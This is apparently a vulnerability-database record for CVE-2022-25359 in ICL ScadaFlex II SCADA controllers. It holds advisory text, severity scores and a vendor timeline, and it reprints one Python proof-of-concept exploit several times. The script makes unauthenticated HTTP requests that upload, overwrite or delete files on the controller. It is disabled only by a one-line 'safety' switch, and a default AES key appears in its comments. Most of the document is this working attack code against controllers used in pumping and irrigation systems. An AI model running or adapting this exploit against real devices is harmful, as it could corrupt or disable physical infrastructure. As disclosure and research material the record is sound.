Description
ICL ScadaFlex II SCADA Controllers SC-1/SC-2 version 1.03.07 is vulnerable to unauthenticated file write/overwrite and deletion. This allows an attacker to execute critical file CRUD operations on the device, which can potentially lead to system access and impact availability.
Related
{"id": "1337DAY-ID-37413", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification Exploit", "description": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 version 1.03.07 is vulnerable to unauthenticated file write/overwrite and deletion. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability.", "published": "2022-02-22T00:00:00", "modified": "2022-02-22T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://0day.today/exploit/description/37413", "reporter": "LiquidWorm", "references": [], "cvelist": ["CVE-2022-25359"], "immutableFields": [], "lastseen": "2022-03-08T22:03:41", "viewCount": 78, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2022-25359"]}, {"type": "exploitdb", "idList": ["EDB-ID:50783"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166103"]}, {"type": "zeroscience", "idList": ["ZSL-2022-5698"]}]}, 
"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-25359"]}, {"type": "exploitdb", "idList": ["EDB-ID:50783"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166103"]}, {"type": "zeroscience", "idList": ["ZSL-2022-5698"]}], "rev": 4}, "score": {"value": 0.8, "vector": "NONE"}, "vulnersScore": 0.8}, "_state": {"dependencies": 1646919479, "score": 1659855189}, "_internal": {"score_hash": "f02ceddce6fc75c65ceda87d8fb6a309"}, "sourceHref": "https://0day.today/exploit/37413", "sourceData": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\n#\n#\n# Vendor: Industrial Control Links, Inc.\n# Product web page: http://www.iclinks.com\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\n# SW: 1.02.20 (build 286), WebLib: 1.24\n# SW: 1.02.15 (build 286), WebLib: 1.22\n# SW: 1.02.01 (build 229), WebLib: 1.16\n# SW: 1.01.14 (build 172), WebLib: 1.14\n# SW: 1.01.01 (build 2149), WebLib: 1.13\n#\n#\n# Summary: Scadaflex II controllers are 100% web based\n# for both configuration and user interface. No applications\n# are required other than any standard web browser. They\n# are easily supported by remote access over the Internet\n# or a cellular link. Scadaflex II controllers support\n# industry standard wired communications using Modbus,\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\n# bridging for Modbus or any other protocol. Each Scadaflex\n# II controller has both analog and digital, inputs and\n# outputs, sufficient for pumping stations, irrigation\n# controls, and other similar process monitoring and control\n# applications. 
They can also serve as communications\n# concentrators and protocol converters that enhance the\n# operation of existing PLCs and process equipment.\n#\n# Desc: The SCADA controller is vulnerable to unauthenticated\n# file write/overwrite and delete vulnerability. This allows\n# an attacker to execute critical file CRUD operations on the\n# device that can potentially allow system access and impact\n# availability.\n#\n# Tested on: SCADA HTTP Server\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2022-5698\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\n#\n# CVE ID: CVE-2022-25359\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\n#\n#\n# 06.11.2021\n#\n\nimport time,sys\nimport requests\nimport datetime\nimport showtime\n\n# Default\n# AES Encryption Key = 'ABCD1234abcd:ICL'\n\ndef bann():\n print('''\n----------------------------------------------------------\n ) ) ) ) ) )\n ( ( ( ( ( (\n ) ) ) ) ) )\n (~~~~~~~~~) (~~~~~~~~~)\n | t00t | | w00t |\n | | | |\n I _._ I _._\n I /' `\\\\ I /' `\\\\\n I | M | I | J |\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\n .' | ||~~~~~~~~| | .' 
| | |~~~~~~~~| |\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\n\n ScadaFlex II SCADA Controllers\n Remote write/delete PoC\n ZSL-2022-5698\n----------------------------------------------------------\n ''')\n\ndef safe(*trigger, ):\n return True # |-| Safety Switch\n\ndef choice(n):\n try:\n if n == 1:\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\n elif n == 2:\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\n else:\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\n raise SystemExit('t00t')\n except Exception as tip:\n raise SystemExit(tip)\n\ndef jump():\n choice(1) if len(sys.argv) == 4 else next\n choice(2) if len(sys.argv) == 3 else next\n\ndef overwrite(controllerip, filepos):\n print('Starting script at', start)\n localfile = sys.argv[2]\n\n with open(localfile, 'rb') as opener:\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/d.php?N'\n scadaurl += str(filepos)\n scadaurl += ',73,'\n scadaurl += opener.name\n scadaurl += '~'\n scadaurl += str(int(time.time()))\n\n see = requests.post(scadaurl, files = {'upload' : opener})\n\n if '100' in see.text:\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\n print('URL: http://' +controllerip+ '/l/' +localfile)\n else:\n print(\"- controller webserver error.\")\n exit()\n\ndef delete(controllerip, filepos):\n print('Starting script at', start)\n exit(42) if isinstance(filepos, str) else next\n\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/rW12IcL_Dat_N'\n scadaurl += str(filepos)\n scadaurl += ',0=1~'\n scadaurl += str(int(time.time()))\n\n see = requests.get(scadaurl)\n\n check = '\\x72\\x57' #|\n check += '\\x31\\x32' #|\n check += '\\x49\\x63' #|\n check += '\\x4c\\x5f' #|\n check += '\\x44\\x61' #|\n check += '\\x74\\x5f' #|\n check += '\\x4e'# o' #|\n check += str(filepos)#|\n 
check += '\\x2c\\x30' #|\n check += '\\x09\\x52' #|\n \n if check in see.text:\n print('File at position {} deleted.'.format(filepos))\n else:\n print('- controller webserver error.')\n exit()\n\ndef main():\n if safe(True):\n print('Careful...\\nSafety: ON')\n exit(17)\n else:\n print('Safety: OFF', end = '')\n global start\n start = datetime.datetime.now()\n start = start.strftime('%d.%m.%Y %H:%M:%S')\n bann(), jump(), choice(1959)\n\nif __name__ == \"__main__\":\n main()\n", "category": "web applications", "verified": true}
{"packetstorm": [{"lastseen": "2022-02-22T17:23:08", "description": "", "cvss3": {}, "published": "2022-02-22T00:00:00", "type": "packetstorm", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-25359"], "modified": "2022-02-22T00:00:00", "id": "PACKETSTORM:166103", "href": "https://packetstormsecurity.com/files/166103/ICL-ScadaFlex-II-SCADA-Controllers-SC-1-SC-2-1.03.07-Remote-File-Modification.html", "sourceData": "`#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n# \n# \n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD \n# \n# \n# Vendor: Industrial Control Links, Inc. \n# Product web page: http://www.iclinks.com \n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf \n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 \n# SW: 1.02.20 (build 286), WebLib: 1.24 \n# SW: 1.02.15 (build 286), WebLib: 1.22 \n# SW: 1.02.01 (build 229), WebLib: 1.16 \n# SW: 1.01.14 (build 172), WebLib: 1.14 \n# SW: 1.01.01 (build 2149), WebLib: 1.13 \n# \n# \n# Summary: Scadaflex II controllers are 100% web based \n# for both configuration and user interface. No applications \n# are required other than any standard web browser. They \n# are easily supported by remote access over the Internet \n# or a cellular link. Scadaflex II controllers support \n# industry standard wired communications using Modbus, \n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial \n# bridging for Modbus or any other protocol. Each Scadaflex \n# II controller has both analog and digital, inputs and \n# outputs, sufficient for pumping stations, irrigation \n# controls, and other similar process monitoring and control \n# applications. They can also serve as communications \n# concentrators and protocol converters that enhance the \n# operation of existing PLCs and process equipment. 
\n# \n# Desc: The SCADA controller is vulnerable to unauthenticated \n# file write/overwrite and delete vulnerability. This allows \n# an attacker to execute critical file CRUD operations on the \n# device that can potentially allow system access and impact \n# availability. \n# \n# Tested on: SCADA HTTP Server \n# \n# \n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \n# @zeroscience \n# \n# \n# Advisory ID: ZSL-2022-5698 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php \n# \n# CVE ID: CVE-2022-25359 \n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 \n# \n# \n# 06.11.2021 \n# \n \nimport time,sys \nimport requests \nimport datetime \nimport showtime \n \n# Default \n# AES Encryption Key = 'ABCD1234abcd:ICL' \n \ndef bann(): \nprint(''' \n---------------------------------------------------------- \n) ) ) ) ) ) \n( ( ( ( ( ( \n) ) ) ) ) ) \n(~~~~~~~~~) (~~~~~~~~~) \n| t00t | | w00t | \n| | | | \nI _._ I _._ \nI /' `\\\\ I /' `\\\\ \nI | M | I | J | \nf | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| \n.' | ||~~~~~~~~| | .' 
| | |~~~~~~~~| | \n/'______|___||__###___|____|/'_______|____|_|__###___|___| \n \nScadaFlex II SCADA Controllers \nRemote write/delete PoC \nZSL-2022-5698 \n---------------------------------------------------------- \n''') \n \ndef safe(*trigger, ): \nreturn True # |-| Safety Switch \n \ndef choice(n): \ntry: \nif n == 1: \noverwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) \nelif n == 2: \ndelete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) \nelse: \nprint('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') \nprint('Usage (Delete): ./sflex.py [IP] [File position number]') \nraise SystemExit('t00t') \nexcept Exception as tip: \nraise SystemExit(tip) \n \ndef jump(): \nchoice(1) if len(sys.argv) == 4 else next \nchoice(2) if len(sys.argv) == 3 else next \n \ndef overwrite(controllerip, filepos): \nprint('Starting script at', start) \nlocalfile = sys.argv[2] \n \nwith open(localfile, 'rb') as opener: \nscadaurl = 'http://' \nscadaurl += controllerip \nscadaurl += '/d.php?N' \nscadaurl += str(filepos) \nscadaurl += ',73,' \nscadaurl += opener.name \nscadaurl += '~' \nscadaurl += str(int(time.time())) \n \nsee = requests.post(scadaurl, files = {'upload' : opener}) \n \nif '100' in see.text: \nprint('File uploaded in {} directory at position {}.'.format('l', filepos)) \nprint('URL: http://' +controllerip+ '/l/' +localfile) \nelse: \nprint(\"- controller webserver error.\") \nexit() \n \ndef delete(controllerip, filepos): \nprint('Starting script at', start) \nexit(42) if isinstance(filepos, str) else next \n \nscadaurl = 'http://' \nscadaurl += controllerip \nscadaurl += '/rW12IcL_Dat_N' \nscadaurl += str(filepos) \nscadaurl += ',0=1~' \nscadaurl += str(int(time.time())) \n \nsee = requests.get(scadaurl) \n \ncheck = '\\x72\\x57' #| \ncheck += '\\x31\\x32' #| \ncheck += '\\x49\\x63' #| \ncheck += '\\x4c\\x5f' #| \ncheck += '\\x44\\x61' #| \ncheck += '\\x74\\x5f' #| \ncheck += '\\x4e'# o' #| \ncheck += 
str(filepos)#| \ncheck += '\\x2c\\x30' #| \ncheck += '\\x09\\x52' #| \n \nif check in see.text: \nprint('File at position {} deleted.'.format(filepos)) \nelse: \nprint('- controller webserver error.') \nexit() \n \ndef main(): \nif safe(True): \nprint('Careful...\\nSafety: ON') \nexit(17) \nelse: \nprint('Safety: OFF', end = '') \nglobal start \nstart = datetime.datetime.now() \nstart = start.strftime('%d.%m.%Y %H:%M:%S') \nbann(), jump(), choice(1959) \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166103/ZSL-2022-5698.txt"}], "cve": [{"lastseen": "2022-03-23T10:28:39", "description": "On ICL ScadaFlex II SCADA Controller SC-1 and SC-2 1.03.07 devices, unauthenticated remote attackers can overwrite, delete, or create files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-26T05:15:00", "type": "cve", "title": "CVE-2022-25359", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25359"], "modified": "2022-03-08T17:46:00", "cpe": 
["cpe:/o:iclinks:scadaflex_ii_firmware:1.03.07", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.20", "cpe:/o:iclinks:weblib:1.16", "cpe:/o:iclinks:weblib:1.24", "cpe:/o:iclinks:weblib:1.13", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.15", "cpe:/o:iclinks:weblib:1.14", "cpe:/o:iclinks:scadaflex_ii_firmware:1.01.14", "cpe:/o:iclinks:weblib:1.22", "cpe:/o:iclinks:scadaflex_ii_firmware:1.01.01", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.01"], "id": "CVE-2022-25359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25359", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.03.07:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.13:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.01:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.15:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.20:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.22:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.16:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.01.01:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.14:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.01.14:*:*:*:*:*:*:*"]}], "zeroscience": [{"lastseen": "2022-03-08T22:29:34", "description": "Title: ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD \nAdvisory ID: [ZSL-2022-5698](<ZSL-2022-5698.php>) \nType: Local/Remote \nImpact: System Access, DoS, Cross-Site Scripting, Manipulation of Data \nRisk: (4/5) \nRelease Date: 22.02.2022 \n\n\n##### Summary\n\nScadaflex II controllers are 100% web based for both configuration and user interface. No applications are required other than any standard web browser. They are easily supported by remote access over the Internet or a cellular link. 
Scadaflex II controllers support industry standard wired communications using Modbus, DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial bridging for Modbus or any other protocol. Each Scadaflex II controller has both analog and digital, inputs and outputs, sufficient for pumping stations, irrigation controls, and other similar process monitoring and control applications. They can also serve as communications concentrators and protocol converters that enhance the operation of existing PLCs and process equipment. \n\n##### Description\n\nThe SCADA controller is vulnerable to unauthenticated file write/overwrite and delete vulnerability. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability. \n\n##### Vendor\n\nIndustrial Control Links, Inc. - <http://www.iclinks.com>\n\n##### Affected Version\n\nSW: 1.03.07 (build 317), WebLib: 1.24 \nSW: 1.02.20 (build 286), WebLib: 1.24 \nSW: 1.02.15 (build 286), WebLib: 1.22 \nSW: 1.02.01 (build 229), WebLib: 1.16 \nSW: 1.01.14 (build 172), WebLib: 1.14 \nSW: 1.01.01 (build 2149), WebLib: 1.13 \n\n##### Tested On\n\nSCADA HTTP Server \n\n##### Vendor Status\n\n[06.11.2021] Vulnerability discovered. \n[16.01.2022] Vendor contacted. \n[21.02.2022] No response from the vendor. \n[22.02.2022] Public security advisory released. 
\n\n##### PoC\n\n[sflex.py](<../../codes/sflex.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359> \n[2] <https://nvd.nist.gov/vuln/detail/CVE-2022-25359> \n[3] <https://packetstormsecurity.com/files/166103> \n[4] <https://cxsecurity.com/issue/WLB-2022020117> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/220156> \n[6] <https://vulners.com/zeroscience/ZSL-2022-5698> \n[7] <https://www.exploit-db.com/exploits/50783> \n[8] <https://www.cisa.gov/uscert/ncas/bulletins/sb22-059>\n\n##### Changelog\n\n[22.02.2022] - Initial release \n[23.02.2022] - Added reference [5], [6] and [7] \n[05.03.2022] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-22T00:00:00", "type": "zeroscience", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25359"], "modified": "2022-02-22T00:00:00", "id": "ZSL-2022-5698", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php", "sourceData": "<html><body><p>#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n#\r\n#\r\n# Vendor: Industrial Control Links, Inc.\r\n# Product web page: http://www.iclinks.com\r\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\r\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\r\n# SW: 1.02.20 (build 286), WebLib: 1.24\r\n# SW: 1.02.15 (build 286), WebLib: 1.22\r\n# SW: 1.02.01 (build 229), WebLib: 1.16\r\n# SW: 1.01.14 (build 172), WebLib: 1.14\r\n# SW: 1.01.01 (build 2149), WebLib: 1.13\r\n#\r\n#\r\n# Summary: Scadaflex II controllers are 100% web based\r\n# for both configuration and user interface. No applications\r\n# are required other than any standard web browser. They\r\n# are easily supported by remote access over the Internet\r\n# or a cellular link. Scadaflex II controllers support\r\n# industry standard wired communications using Modbus,\r\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\r\n# bridging for Modbus or any other protocol. Each Scadaflex\r\n# II controller has both analog and digital, inputs and\r\n# outputs, sufficient for pumping stations, irrigation\r\n# controls, and other similar process monitoring and control\r\n# applications. They can also serve as communications\r\n# concentrators and protocol converters that enhance the\r\n# operation of existing PLCs and process equipment.\r\n#\r\n# Desc: The SCADA controller is vulnerable to unauthenticated\r\n# file write/overwrite and delete vulnerability. 
This allows\r\n# an attacker to execute critical file CRUD operations on the\r\n# device that can potentially allow system access and impact\r\n# availability.\r\n#\r\n# Tested on: SCADA HTTP Server\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2022-5698\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\r\n#\r\n# CVE ID: CVE-2022-25359\r\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\r\n#\r\n#\r\n# 06.11.2021\r\n#\r\n\r\nimport time,sys\r\nimport requests\r\nimport datetime\r\nimport showtime\r\n\r\n# Default\r\n# AES Encryption Key = 'ABCD1234abcd:ICL'\r\n\r\ndef bann():\r\n print('''\r\n----------------------------------------------------------\r\n ) ) ) ) ) )\r\n ( ( ( ( ( (\r\n ) ) ) ) ) )\r\n (~~~~~~~~~) (~~~~~~~~~)\r\n | t00t | | w00t |\r\n | | | |\r\n I _._ I _._\r\n I /' `\\\\ I /' `\\\\\r\n I | M | I | J |\r\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\r\n .' | ||~~~~~~~~| | .' 
| | |~~~~~~~~| |\r\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\r\n\r\n ScadaFlex II SCADA Controllers\r\n Remote write/delete PoC\r\n ZSL-2022-5698\r\n----------------------------------------------------------\r\n ''')\r\n\r\ndef safe(*trigger, ):\r\n return True # |-| Safety Switch\r\n\r\ndef choice(n):\r\n try:\r\n if n == 1:\r\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\r\n elif n == 2:\r\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\r\n else:\r\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\r\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\r\n raise SystemExit('t00t')\r\n except Exception as tip:\r\n raise SystemExit(tip)\r\n\r\ndef jump():\r\n choice(1) if len(sys.argv) == 4 else next\r\n choice(2) if len(sys.argv) == 3 else next\r\n\r\ndef overwrite(controllerip, filepos):\r\n print('Starting script at', start)\r\n localfile = sys.argv[2]\r\n\r\n with open(localfile, 'rb') as opener:\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/d.php?N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',73,'\r\n scadaurl += opener.name\r\n scadaurl += '~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.post(scadaurl, files = {'upload' : opener})\r\n\r\n if '100' in see.text:\r\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\r\n print('URL: http://' +controllerip+ '/l/' +localfile)\r\n else:\r\n print(\"- controller webserver error.\")\r\n exit()\r\n\r\ndef delete(controllerip, filepos):\r\n print('Starting script at', start)\r\n exit(42) if isinstance(filepos, str) else next\r\n\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/rW12IcL_Dat_N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',0=1~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.get(scadaurl)\r\n\r\n check = '\\x72\\x57' #|\r\n check += '\\x31\\x32' #|\r\n check += '\\x49\\x63' #|\r\n 
check += '\\x4c\\x5f' #|\r\n check += '\\x44\\x61' #|\r\n check += '\\x74\\x5f' #|\r\n check += '\\x4e'# o' #|\r\n check += str(filepos)#|\r\n check += '\\x2c\\x30' #|\r\n check += '\\x09\\x52' #|\r\n \r\n if check in see.text:\r\n print('File at position {} deleted.'.format(filepos))\r\n else:\r\n \tprint('- controller webserver error.')\r\n exit()\r\n\r\ndef main():\r\n if safe(True):\r\n print('Careful...\\nSafety: ON')\r\n exit(17)\r\n else:\r\n print('Safety: OFF', end = '')\r\n global start\r\n start = datetime.datetime.now()\r\n start = start.strftime('%d.%m.%Y %H:%M:%S')\r\n bann(), jump(), choice(1959)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/sflex.txt", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-11T20:08:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-23T00:00:00", "type": "exploitdb", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-25359", 
"CVE-2022-25359"], "modified": "2022-02-23T00:00:00", "id": "EDB-ID:50783", "href": "https://www.exploit-db.com/exploits/50783", "sourceData": "# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n# Exploit Author: LiquidWorm\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n#\r\n#\r\n# Vendor: Industrial Control Links, Inc.\r\n# Product web page: http://www.iclinks.com\r\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\r\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\r\n# SW: 1.02.20 (build 286), WebLib: 1.24\r\n# SW: 1.02.15 (build 286), WebLib: 1.22\r\n# SW: 1.02.01 (build 229), WebLib: 1.16\r\n# SW: 1.01.14 (build 172), WebLib: 1.14\r\n# SW: 1.01.01 (build 2149), WebLib: 1.13\r\n#\r\n#\r\n# Summary: Scadaflex II controllers are 100% web based\r\n# for both configuration and user interface. No applications\r\n# are required other than any standard web browser. They\r\n# are easily supported by remote access over the Internet\r\n# or a cellular link. Scadaflex II controllers support\r\n# industry standard wired communications using Modbus,\r\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\r\n# bridging for Modbus or any other protocol. Each Scadaflex\r\n# II controller has both analog and digital, inputs and\r\n# outputs, sufficient for pumping stations, irrigation\r\n# controls, and other similar process monitoring and control\r\n# applications. They can also serve as communications\r\n# concentrators and protocol converters that enhance the\r\n# operation of existing PLCs and process equipment.\r\n#\r\n# Desc: The SCADA controller is vulnerable to unauthenticated\r\n# file write/overwrite and delete vulnerability. 
